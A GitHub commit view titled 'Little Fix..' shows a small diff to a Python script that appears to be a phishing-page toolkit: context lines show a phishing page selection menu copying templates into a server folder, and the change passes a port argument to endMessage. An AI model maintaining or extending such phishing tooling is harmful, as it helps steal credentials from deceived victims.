Little Fix..

This commit is contained in:
AnonUD4Y 2020-01-10 05:07:18 +00:00 committed by GitHub
parent bbc1e67db5
commit b534e580b1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -148,7 +148,7 @@ def runPhishing(page, customOption): # Phishing pages selection menu
sleep(3)
copy_tree('WebPages/CUSTOM(2)/', "Server/www/")
else:
endMessage()
endMessage(port)
def selectPort(): # Question where user must select port
@ -812,7 +812,7 @@ ________________________________________________________________________________
customOption = ''
runPhishing('CUSTOM(2)', customOption)
else:
endMessage()
endMessage(port)
def loadModule(module): # This one just show text..